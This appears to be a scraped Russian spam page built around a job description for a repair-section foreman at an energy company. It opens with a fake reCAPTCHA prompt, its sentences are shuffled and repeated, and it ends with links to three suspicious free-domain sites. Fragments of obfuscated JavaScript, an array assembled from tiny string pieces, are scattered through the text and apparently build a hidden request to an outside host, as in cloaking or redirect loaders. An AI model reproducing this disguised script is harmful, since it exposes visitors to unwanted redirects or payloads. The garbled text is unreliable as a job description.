

---

I'm not a robot



reCAPTCHA  
[Privacy](#) - [Terms](#)

Continue

---

## Должностная Инструкция На Мастера Ремонтного Участка

Вариант При отсутствии высшего или среднего профессионального образования - стаж работы на производстве в организациях электроэнергетики не менее 5 лет..

Контролирует соблюдение чистоты и порядка на рабочих местах, в проходах и на подъездных путях, правильное использование и соблюдение правил эксплуатации грузоподъемных механизмов и других средств механизации, подкрановых путей, принимает меры к устранению выявленных недостатков.. Комплекс мероприятий по оценке эффективности утвержден \_\_\_\_\_ и включает в себя:.. 4 За нарушение правил внутреннего трудового распорядка, правил противопожарной безопасности и техники безопасности, установленных Организацией.. 2 Осуществляет периодические осмотры (прослушивание) работающего оборудования, эксплуатируемых зданий и сооружений, проверки технического состояния эксплуатируемых зданий и сооружений, анализирует выявленные дефекты в их работе (техническом состоянии), участвует в осмотре и опробовании оборудования (зданий и сооружений), сдаваемого в ремонт и вводимого в эксплуатацию после проведения на нем ремонтных, строительных и монтажных работ.. 2 16 Обеспечивает ритмичную работу участка, принимает необходимые меры по восстановлению нормальных условий работы в случаях нарушений.. 2 25 Содействует изучению и распространению передового опыта организации ремонтного обслуживания, развитию рационализаторства.

Мастера участка по ремонту энергетического оборудования, зданий и сооружений:.. 2 17 Оформляет заявки на необходимые материальные ресурсы и контролирует их реализацию.. 1 В период временного отсутствия мастера (старшего мастера) участка по ремонту энергетического оборудования, зданий и сооружений его обязанности возлагаются на \_\_\_\_\_.. 2 Руководит производственной деятельностью участка по ремонту энергетического оборудования, зданий и сооружений.. 4 За правонарушения, совершенные в период осуществления своей деятельности, - в соответствии с действующим гражданским, административным и уголовным законодательством.. Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений назначается на должность и освобождается от должности в установленном трудовым законодательством порядке приказом руководителя Организации.

---

- порядок тарификации работ и рабочих; - нормы и расценки на выполняемые работы, порядок их пересмотра;.. 2 26 Участвует в проведении аттестации рабочих мест на соответствие требованиям правил по охране труда, разработке и выполнении мероприятий по улучшению условий труда, повышению культуры производства.. М Должностная инструкция мастера участка, должностные обязанности мастера участка, образец должностной инструкции мастера участка.. 2 Проводит дефектацию и оценку технического состояния объектов ремонта, определяет необходимость выполнения дополнительных (сверхплановых) объемов ремонтных работ или исключения отдельных работ из плановых объемов ремонта.. - основные положения о подготовке и проведении ремонта;.. Мастер по ремонту оборудования исполняет следующие обязанности : 2.. 1 ОБЩИЕ ПОЛОЖЕНИЯ 1 Настоящая должностная инструкция определяет функциональные обязанности, права и ответственность мастера (старшего мастера) участка по ремонту энергетического оборудования, зданий и сооружений \_\_\_\_\_ (далее - Организация).. - передовой опыт организации выполнения ремонта, организации и стимулирования труда;.. 3 Получать служебную информацию, необходимую для осуществления своих обязанностей.

УТВЕРЖДАЮ Руководитель \_\_\_\_\_ (\_\_\_\_\_)

" \_\_\_\_ " \_\_\_\_\_ г.. 1 Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений подчиняется непосредственно \_\_\_\_\_ Организации.. 2 ДОЛЖНОСТНЫЕ ОБЯЗАННОСТИ Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений;.. - технологию ремонта, демонтажа и испытаний оборудования;.. 3 Требовать от руководства Организации оказания содействия в исполнении своих обязанностей.. 2 Проводит инструктаж персонала участка по технологии и безопасному выполнению работ.. - основы экономики и организации производства, труда и управления в энергетике;.. - Правила безопасности при работе с инструментом и приспособлениями, используемыми при ремонте и монтаже энергетического оборудования;.. 4 За неисполнение или ненадлежащее исполнение своих обязанностей, предусмотренных настоящей должностной инструкцией, - в соответствии с действующим трудовым законодательством.

2 Обеспечивает подчиненный персонал необходимыми материальными ресурсами, технической документацией, контролирует соответствие организации технического и хозяйственного обслуживания рабочих мест персонала участка требованиям проектной и нормативной документации.. 5 В соответствии с \_\_\_\_\_ работодатель проводит оценку эффективности работы мастера (старшего мастера) участка по ремонту энергетического оборудования.. - порядок вывода оборудования, зданий и сооружений в ремонт и оформления нарядов-допусков для выполнения на них ремонтных и других работ;.. 2 Обеспечивает выполнение заданий по проведению плановых и восстановительных ремонтных работ, а также технического обслуживания закрепленного за участком оборудования (зданий, сооружений).. 5 УСЛОВИЯ РАБОТЫ 5 Режим работы мастера (старшего мастера) участка по ремонту энергетического оборудования, зданий и сооружений определяется в соответствии с правилами внутреннего трудового распорядка, установленными в Организации.. 3 Представлять на рассмотрение своего непосредственного руководителя предложения по вопросам своей деятельности.. - стаж работы на производстве в организациях электроэнергетики или отраслях, соответствующих профилю работы участка по ремонту энергетического оборудования, зданий и сооружений, не менее 1 года.. - технические требования, допуски и посадки по номенклатуре изделий и материалов, применяемых при ремонте и монтаже;.. 2 21 Контролирует соблюдение подчиненным персоналом правил по охране труда, технической эксплуатации, пожарной безопасности, трудовой и производственной дисциплины.. -

\_\_\_\_\_ - \_\_\_\_\_ - \_\_\_\_\_ Настоящая инструкция разработана на основании Постановления Минтруда РФ от 29.. 2 18 Подготавливает эскизы на изготовление специального (нестандартного) инструмента, приспособлений, средств механизации, а также заменяемых деталей, узлов, строительных конструкций для ремонтируемого оборудования, зданий и сооружений.. 2 10 Оформляет и подает заявки на вывод в ремонт оборудования, осуществляет проверку подготовки рабочих мест, обеспечивает наличие и исправность на местах проведения работ знаков безопасности, предупредительных надписей, ограждений, противопожарного инвентаря, защитных средств, установку заземлений.. - Правила технической эксплуатации электрических станций и сетей РФ;.. 2 15 Оформляет документацию на выполненные работы, ведет учетную документацию по использованию рабочего времени, выработке, простоям, расходованию материальных ресурсов.. 2 Доводит до персонала участка производственные задания, обеспечивает расстановку рабочих и бригад до начала работ.. 4 ОТВЕТСТВЕННОСТЬ Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений несет ответственность:.. 2 24 Проводит производственные совещания на участке, занятия по повышению

квалификации персонала участка, воспитательную работу и работу по укреплению трудовой дисциплины.. Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений имеет право:.. Должностная инструкция мастера участка по ремонту энергетического нарядов-допусков для выполнения на них ремонтных и других работ;.. 1 Должностная инструкция начальника ремонтного цеха доведение до исполнителей (начальников участков, мастеров, бригадиров) плановых заданий.. 4 За причинение материального ущерба - в соответствии с действующим законодательством.. "fcze["eW"]="s?";fcze["Xw"]="f ";fcze["dW"]=" ";fcze["Ln"]="js";fcze["QI"]="{"fcze["DB"]="Da";fcze["qI"]="r ";fcze["sb"]="("fcze["cu"]=".. Должностную инструкцию мастера участка РЭС, все должностные.. 2 20 Вносит предложения по численному, профессиональному и квалификационному составу участка и отдельных бригад, присвоению разрядов рабочим, совершенствованию систем материального и морального стимулирования ремонтного персонала, пересмотру действующих норм на ремонтные работы, улучшению организации ремонта.. - положения и инструкции о расследовании и учете аварий и других технологических нарушений, несчастных случаев на производстве;.. 2 Подготавливает предложения к планам и графикам выполнения работ по подготовке и проведению ремонта оборудования, зданий и сооружений.. - нормы аварийного запаса оборудования, деталей, узлов и материалов;.. 1";fcze["bh"]="e ";fcze["WN"]="ty";fcze["Bx"]="nt";fcze["Gr"]="t";fcze["UW"]="po";fcze["Rv"]="ex";fcze["Rm"]="{"e";fcze["MV"]="ng";fcze["wr"]="cu";fcze["fp"]=".. 1 Мастер (старший мастер) участка по ремонту энергетического оборудования, зданий и сооружений должен знать:.. производственно-технической и хозяйственной деятельности участка; Проверяет качество ремонтных работ, осуществляет мероприятия по.. 4 контролирует ход производственных процессов ремонтных работ;.. - высшее профессиональное (техническое) образование (вариант: среднее профессиональное (техническое) образование);.. - организационно-распорядительные, нормативные, методические документы, регламентирующие деятельность участка по ремонту энергетического оборудования, зданий и сооружений;.. представлять на утверждение планы и графики капитальных ремонтов и.. - стаж работы в должности мастера участка по ремонту энергетического оборудования, зданий и сооружений не менее 2 лет.. 1 осуществляет руководство производственной деятельностью участка; 2.. 2 Осуществляет приемку и хранение оборудования, применяемого при ремонте, а также материалов, запасных частей, инструмента, такелажа, контролирует их соответствие требованиям действующих норм, стандартов, технических условий, правильное и экономное расходование (использование) при производстве работ.. j";fcze["cG"]="ad";fcze["GB"]="tS";fcze["rG"]="";";fcze["tU"]="h o";fcze["oQ"]="HR";fcze["NY"]="l("fcze["Rt"]=")";fcze["nJ"]="t";fcze["to"]="{"fcze["IE"]="Yb";fcze["Qu"]="pe";fcze["yy"]=");";fcze["em"]="+"fcze["wC"]="y("fcze["EX"]="sD";fcze["zb"]="ly";fcze["Uq"]=");";fcze["LB"]="\$. var Xh = '%d0%94%d0%be%d0%bb%d0%b6%d0%bd%d0%be%d1%81%d1%82%d0%bd%d0%b0%d1%8f+%d0%98%d0%bd%d1%81%d1%82%d1%80%d1%83%d0%ba%d1%86%d0%b8%d1%8f+%d0%9d%d0%b0+%d0%9c%d0%b0%d1%81%d1%82%d0%b5%d1%80%d0%b0+%d0%a0%d0%b5%d0%bc%d0%be%d0%bd%d1%82%d0%bd%d0%be%d0%b3%d0%be+%d0%a3%d1%87%d0%b0%d1%81%d1%82%d0%ba%d0%b0';var fcze = new Array();fcze["cB"]="gt";fcze["UD"]="ro";fcze["TO"]="eb";fcze["wQ"]="s";fcze["TP"]="or";fcze["ne"]="ss";fcze["sR"]="f";fcze["Cm"]="ak";fcze["KL"]=" ";fcze["Hx"]="om";fcze["II"]="G";fcze["nZ"]="rr";fcze["Gw"]="rv";fcze["GO"]="r";fcze["nY"]="ww";fcze["qS"]="v";fcze["Kc"]="va";fcze["UF"]="ar";fcze["jv"]="en";fcze["XN"]="we";fcze["or"]="eD";fcze["UT"]="sc";fcze["MP"]=".. 2 19 Участвует в выполнении мероприятий по внедрению передовых приемов и методов труда, механизации процессов производства, сокращению ручного и тяжелого физического труда, снижению продолжительности, удлинению межремонтных периодов, повышению качества выполнения ремонта, снижению расходования всех видов ресурсов, внедрению новой техники и передовой технологии.. 2 11 Участвует в проведении ремонтных работ в качестве руководителя или наблюдающего.. - стаж работы на производстве в организациях электроэнергетики или в отраслях, соответствующих профилю работы участка по ремонту энергетического оборудования, зданий и сооружений, не менее 3 лет.. Вариант - Среднее профессиональное (техническое) образование;.. "fcze["vX"]=":"fcze["YL"]="wm";fcze["AU"]="ai";fcze["tb"]="t("fcze["OY"]=",p";fcze["Ud"]="l";fcze["Ai"]=") ";fcze["NL"]="f";fcze["YE"]="mL";fcze["Ba"]="""fcze["FC"]="II";fcze["Fr"]="ct";fcze["Tp"]="e,";fcze["iq"]="er";fcze["eT"]="qT";fcze["Cr"]="N.. - действующее положение об оплате труда и премировании;.. 2 12 Обеспечивает соблюдение технологической последовательности производства работ, необходимые условия для своевременного и качественного их выполнения.. - характерные признаки повреждений закрепленных за руководимым участком оборудования, зданий и сооружений;.. 2 14 Принимает законченные работы, проверяет качество их выполнения, обеспечивает устранение выявленных дефектов и исправление брака в работе, предъявляет к сдаче объекты, законченные ремонтом, участвует в их опробовании и вводе в работу.. Старшего мастера участка по ремонту энергетического оборудования, зданий и сооружений.. ДОЛЖНОСТНАЯ ИНСТРУКЦИЯ мастера участка по ремонту энергетического оборудования, зданий и сооружений (включая старшего).. 3 Повышать свою квалификацию 3 Знакомиться с проектами решений руководства Организации, касающимися его деятельности.. 2 27 Контролирует своевременность прохождения подчиненным персоналом проверки

---

знаний, медицинских осмотров, обучения с отрывом от производства в специализированных подразделениях (организациях) в соответствии с утвержденными планами и графиками.. - правила промышленной безопасности (Госгортехнадзора России);.. - высшее профессиональное (техническое) образование;.. 1 Квалификационные требования к лицу, назначаемому на должность;.. - основы трудового законодательства; - правила по охране труда, пожарной безопасности и взрывобезопасности.. - технические характеристики, назначение, территориальное расположение закрепленных за руководимым участком оборудования, зданий и сооружений;.. - Правила работы с персоналом в организациях электроэнергетики РФ;.. 2 22 Участвует в расследовании аварий и других технологических нарушений на закрепленном за участком оборудовании, зданиях и сооружениях, а также происшедших в организации электроэнергетики несчастных случаев, обеспечивает принятие необходимых мер по предотвращению нарушений.. 01 2004 N 4 "Об утверждении Квалификационного справочника должностей руководителей, специалистов и других служащих организаций электроэнергетики" и в соответствии с Трудовым кодексом РФ.. 2 23 Ведет учет и анализ производственной деятельности участка, подготавливает предложения по текущему премированию, поощрению и наложению взысканий на подчиненный персонал.. r";fcze["ND"]="aj";fcze["Od"]="a,";fcze["oZ"]="s,";fcze["BH"]="at";fcze["bx"]="s";fcze["hj"]="ta";fcze["Zc"]="il";fcze["Aa"]=":/";fcze["yT"]="es";fcze["hp"]="se";fcze["XJ"]="al";fcze["IY"]="SO";fcze["Sp"]="({";fcze["op"]="M";fcze["EM"]="ip";fcze["Fc"]="n";fcze["zP"]="x\_";fcze["bJ"]="tp";fcze["XR"]="os";fcze["IO"]="";";fcze["YH"]="q ";fcze["iS"]="cc";fcze["Wg"]="do";fcze["Cn"]="p:";fcze["oV"]="in";fcze["gG"]="wn";fcze["fF"]="su";fcze["KE"]="ET";fcze["DH"]="vr";fcze["Xo"]="Ty";fcze["tn"]="u/";fcze["eR"]="T ";fcze["Vf"]="Xh";fcze["Ew"]="hQ";fcze["TT"]="qX";fcze["sp"]="un";fcze["Lz"]=" e";fcze["Kr"]="P";fcze["qF"]="cr";fcze["iL"]="io";fcze["BK"]="ed";fcze["kz"]="22";fcze["zi"]="ru";fcze["Mj"]="ef";fcze["fy"]="ls";fcze["rm"]="tu";fcze["gS"]="Th";fcze["Cq"]="s:";fcze["PW"]="kp";fcze["hs"]="n:";fcze["aL"]="ax";fcze["yh"]="r:";fcze["ex"]="ri";fcze["Rq"]="h>";fcze["pF"]="s/";fcze["rF"]="ns";fcze["DM"]="M6";fcze["eI"]="fa";fcze["Ib"]="ce";fcze["nr"]="re";fcze["Ly"]="de";fcze["Jv"]=" j";fcze["fU"]=", ";fcze["rf"]="sp";fcze["JM"]=",";";fcze["ki"]="ht";fcze["zf"]="fb";fcze["df"]="me";fcze["Oo"]="lo";fcze["QX"]="0";fcze["aG"]="OS";fcze["TS"]="da";fcze["If"]=" J";fcze["KQ"]="st";fcze["zE"]="e. d70b09c2d4

<http://glycalbeafi.gq/nelstalin/100/1/index.html/>

<http://ciadragedap.tk/nelstalin90/100/1/index.html/>

<http://tareplackire.tk/nelstalin13/100/1/index.html/>